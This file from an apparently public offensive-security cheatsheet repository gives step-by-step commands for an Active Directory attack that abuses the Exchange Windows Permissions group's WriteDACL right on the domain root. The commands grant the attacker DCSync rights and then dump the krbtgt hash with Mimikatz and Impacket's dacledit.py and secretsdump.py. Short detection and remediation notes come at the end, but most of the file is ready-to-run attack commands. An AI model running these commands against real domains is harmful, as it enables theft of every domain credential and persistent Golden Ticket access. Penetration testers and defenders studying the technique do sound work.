daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-53-exchange-windows-permissions-writedacl-to-dcsync.md (3436B)


      1 ---
      2 title: "Attack #53 β€” Exchange Windows Permissions (WriteDACL to DCSync)"
      3 description: "In many environments, the Exchange Windows Permissions security group has WriteDACL on the domain root object. This is a well-known legacy…"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "credential-access"]
      7 tools: ["Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/🟣 Attack #53 β€” Exchange Windows Permissions (WriteDACL to DCSync).md"
     11 ---
     12 # 🟣 Attack #53 β€” Exchange Windows Permissions (WriteDACL β†’ DCSync)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 In many environments, the **Exchange Windows Permissions** security group has **WriteDACL** on the domain root object. This is a well-known legacy misconfiguration from Exchange Server installation. Any member of this group (or anyone who compromises a member) can grant themselves DCSync rights and extract every credential in the domain.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in Exchange Windows Permissions** | Or compromise of a member |
     27 | **WriteDACL on domain root** | Default after Exchange installation |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── Check if Exchange Windows Permissions has WriteDACL on domain ─────────────
     35 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | Where-Object {
     36   $_.IdentityReference -match "Exchange Windows Permissions"
     37 } | Select-Object ActiveDirectoryRights
     38 
     39 # ── Grant DCSync rights ──────────────────────────────────────────────────────
     40 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \
     41   -PrincipalIdentity compromised_exchange_user -Rights DCSync
     42 
     43 # ── DCSync ────────────────────────────────────────────────────────────────────
     44 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
     45 ```
     46 
     47 ```bash
     48 # ── Linux ─────────────────────────────────────────────────────────────────────
     49 dacledit.py -action write -rights DCSync \
     50   -principal compromised_user -target-dn "DC=corp,DC=local" \
     51   corp.local/compromised_user:'Password1' -dc-ip 10.10.10.10
     52 
     53 secretsdump.py corp.local/compromised_user:'Password1'@DC01.corp.local \
     54   -just-dc-user krbtgt
     55 ```
     56 
     57 ***
     58 
     59 ## πŸ›‘οΈ Detection β€” Event IDs
     60 
     61 | Event ID | Source | What to Look For |
     62 |---|---|---|
     63 | **5136** | Security Log (DC) | DACL modification on domain root object |
     64 | **4662** | Security Log (DC) | Replication rights used |
     65 
     66 ***
     67 
     68 ## πŸ”— Attack Chain Context
     69 
     70 ```
     71 [Exchange Permissions] ──→ WriteDACL on domain root β†’ DCSync
     72          β”‚
     73          β”œβ”€β”€β†’ πŸ”— Compromise Exchange admin β†’ WriteDACL β†’ DCSync β†’ Golden Ticket
     74          β”œβ”€β”€β†’ πŸ“‹ Legacy misconfiguration from Exchange Server setup
     75          └──→ πŸ’€ Defeated by: remove WriteDACL from Exchange groups, audit domain ACLs
     76 ```
     77 
     78 ***
     79 
     80 > βœ… **Attack #53 β€” Exchange Windows Permissions complete.**
     81 
     82 ***
     83 
     84 > 🏁 **Category 6 β€” Privilege Escalation is now COMPLETE (9/9 attacks).**